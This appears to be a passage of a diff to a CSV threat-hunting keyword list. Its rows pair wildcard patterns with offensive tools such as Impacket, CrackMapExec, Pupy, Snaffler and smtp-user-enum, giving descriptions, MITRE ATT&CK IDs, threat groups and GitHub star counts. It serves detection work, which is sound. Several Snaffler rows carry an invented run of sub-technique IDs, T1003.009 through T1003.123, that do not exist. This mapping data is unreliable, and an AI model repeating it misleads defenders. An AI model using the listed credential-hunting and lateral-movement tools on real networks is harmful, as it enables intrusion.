"*smbscan*","offensive_tool_keyword","smb-scanner","SMB Scanner tool","T1210.001 - T1190 - T1020 - T1213","TA0007 - 
TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/TechnicalMujeeb/smb-scanner","1","1","N/A","N/A","1","45","9","2018-03-30T10:25:18Z","2018-03-29T14:13:20Z" "*smb-scanner*","offensive_tool_keyword","smb-scanner","SMB Scanner tool","T1210.001 - T1190 - T1020 - T1213","TA0007 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/TechnicalMujeeb/smb-scanner","1","1","N/A","N/A","1","45","9","2018-03-30T10:25:18Z","2018-03-29T14:13:20Z" "*SmbScanner.exe*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","","N/A","","","" -"*smbserver.py -payload*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*smbserver.py -payload*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*smbserver.py -smb2support 
EXEGOL*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*smbserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*smbsigning_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*smbspider *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*smbspider.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*smbserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*smbsigning_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*smbspider *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*smbspider.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*smbsr.py*","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","2","138","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*smicallef/spiderfoot*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*SMShell.sln*","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. 
Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","1","N/A","10","10","272","20","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" "*smtprelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*smtprelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*smtprelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*smtp-user-enum * -M EXPN *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*smtp-user-enum * -M RCPT *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*smtp-user-enum * -M VRFY *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*smtp-user-enum*","offensive_tool_keyword","smtp-user-enum","Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN - VRFY or RCPT TO.","T1133 - T1110.001","TA0007 - TA0006","N/A","N/A","Credential Access","https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*SnaffCon/Snaffler*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*SnaffCore.csproj*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - 
T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*SnaffCore/ActiveDirectory*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - 
T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*SnaffCore/Classifiers*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - 
T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*SnaffCore/Concurrency*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - 
T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*SnaffCore/Config*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 
- T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*SnaffCore/ShareFind*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - 
T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*SnaffCore/TreeWalk*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - 
T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*Snaffler.csproj*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*Snaffler.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
